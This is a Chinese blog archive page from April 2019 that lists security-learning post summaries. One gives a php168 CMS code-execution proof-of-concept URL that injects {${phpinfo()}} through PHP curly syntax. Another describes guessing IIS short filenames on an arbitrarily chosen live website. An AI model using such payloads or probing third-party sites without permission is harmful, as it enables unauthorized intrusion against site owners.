• 博客园logo
  • 会员
  • 周边
  • 新闻
  • 博问
  • 闪存
  • 众包
  • 赞助商
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
danku
博客园 | 首页 | 新随笔 | 新文章 | 联系 | 订阅 订阅 | 管理

04 2019 档案

 
php 168任意代码执行漏洞之php的Complex (curly) syntax
摘要:今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML 阅读全文
posted @ 2019-04-27 12:16 油炸冰淇淋 阅读(876) 评论(0) 推荐(0)
IIS系统短文件名漏洞猜解过程
摘要:今天看教程的时候,老师关于后台管理说到了短文件名漏洞,我就随便找了个网站猜解,可能是运气太好了,有了这次实践的过程,因为这个漏洞是13年的时候比较火,现在差不多都修复了,抓到一条漏网之鱼, 短文件名漏洞形成原理网上有很多,这里就不赘述了, 手工猜解也是不可能滴,耗时又耗力,伟大的GITHUB上已经有 阅读全文
posted @ 2019-04-26 14:41 油炸冰淇淋 阅读(956) 评论(0) 推荐(1)
关于python3.6和python2.7共存时,sqlmap的使用说明(遇到的出错情况)
该文被密码保护。
posted @ 2019-04-24 22:46 油炸冰淇淋 阅读(2) 评论(0) 推荐(0)
 

公告


博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3